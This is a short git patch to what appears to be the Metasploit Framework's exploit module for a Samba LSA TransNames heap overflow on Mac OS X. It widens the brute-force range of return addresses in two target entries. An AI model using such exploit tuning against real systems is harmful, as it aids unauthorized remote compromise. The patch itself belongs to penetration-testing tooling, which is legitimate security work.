From febc0feb289633ed00d8d95248bf9d66ffc38304 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 5 Jul 2007 15:12:02 +0000 Subject: [PATCH] Increase the brute force range (thanks toto_) git-svn-id: file:///home/svn/framework3/trunk@5032 4d416f70-5f16-0410-b530-b9f4589650da --- modules/exploits/osx/samba/lsa_transnames_heap.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 82f52993e9..6d64724ea2 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -55,7 +55,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote 'Nops' => 4 * 1024, 'Bruteforce' => { - 'Start' => { 'Ret' => 0x0181c000 }, + 'Start' => { 'Ret' => 0x01813000 }, 'Stop' => { 'Ret' => 0x01820000 }, 'Step' => 256, }, @@ -74,7 +74,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote 'Nops' => 1600, 'Bruteforce' => { - 'Start' => { 'Ret' => 0x0181c000 }, + 'Start' => { 'Ret' => 0x01813000 }, 'Stop' => { 'Ret' => 0x01830000 }, 'Step' => 796, }